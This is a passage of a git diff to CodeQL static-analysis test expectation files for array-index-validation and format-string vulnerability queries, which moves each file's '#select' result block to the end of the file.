| fgets output argument | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 3377b266d0a2..184af69e72c4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,8 +1,3 @@ -#select -| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | edges | test1.c:7:26:7:29 | **argv | test1.c:8:11:8:14 | call to atoi | provenance | TaintFunction | | test1.c:8:11:8:14 | call to atoi | test1.c:9:9:9:9 | i | provenance | | @@ -35,3 +30,8 @@ nodes | test1.c:53:3:53:7 | ... = ... | semmle.label | ... = ... | | test1.c:55:15:55:15 | j | semmle.label | j | subpaths +#select +| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected index 79b6ff33410e..560ecc8bd775 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected @@ -1,7 +1,3 @@ -#select -| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | -| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | -| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | edges | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | provenance | | | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | @@ -25,3 +21,7 @@ nodes | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | semmle.label | *data | subpaths +#select +| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | +| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | +| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected index ca7aa17cf086..7b87c3ff440a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected @@ -1,28 +1,3 @@ -#select -| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | edges | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | provenance | | | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | provenance | | @@ -157,3 +132,28 @@ subpaths | argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:122:15:122:16 | printWrapper output argument | | argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:128:15:128:16 | printWrapper output argument | | argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:132:15:132:20 | printWrapper output argument | +#select +| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected index e853d5457f65..b5f6ad602fb8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected @@ -1,27 +1,3 @@ -#select -| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | -| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | -| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | -| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | -| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | edges | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:30:9:30:14 | *access to array | provenance | | | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:123:2:123:12 | *... = ... | provenance | | @@ -93,3 +69,27 @@ nodes | consts.cpp:144:16:144:18 | readStringRef output argument | semmle.label | readStringRef output argument | | consts.cpp:145:9:145:11 | *v12 | semmle.label | *v12 | subpaths +#select +| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | +| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | +| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | +| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The 